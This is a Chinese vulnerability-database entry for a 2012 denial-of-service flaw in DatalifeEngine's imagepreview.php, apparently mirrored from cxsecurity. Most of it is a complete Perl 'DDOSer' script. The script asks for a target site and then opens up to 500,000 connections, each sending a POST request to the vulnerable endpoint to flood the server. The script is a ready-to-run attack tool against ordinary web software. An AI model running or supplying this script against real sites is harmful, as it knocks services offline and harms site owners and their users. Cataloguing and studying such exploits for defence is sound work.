DatalifeEngine imagepreview.php Denial Of Service Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047245 漏洞类型
发布时间 2012-06-17 更新时间 2012-06-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060198
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
# DatalifeEngine 'imagepreview.php' Denial Of Service Vulnerability
# Software Link : http://www.datalifeengine.ir/
# Home : http://Www.IrIsT.Ir/forum
# Greetz to all members of IrIsT.Ir & Iranian Team

use IO::Socket;
print "###########################################################################\n";
print "#                                                                         #\n";
print "#  Islamic Republic Of Iran Security Team  -  Datalife Engine DDOSer      #\n";
print "#  Home :  Www.IrIsT.Ir  &   Www.IrIsT.Ir/forum                           #\n";
print "#  Greetz to all members of IrIsT & Iranian Team                          #\n";
print "#                                                                         #\n";
print "###########################################################################\n";
print "Datalife  DDOSer\n";
print "Site : ";
$HOST = <STDIN>; 
chop ($HOST); 

$i=0;
while($i<500000){
$i++;

$lower=1; 
$upper=200000; 
$random = int(rand( $upper-$lower+1 ) ) + $lower; 
$FILE = "image.jpg";
$LENGTH = length $FILE;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "*";
print $get1 "POST /engine/modules/imagepreview.php HTTP/1.1\n";
print $get1 "Host: ".$HOST. "\n";
print $get1 $FILE;
syswrite STDOUT, "*";
}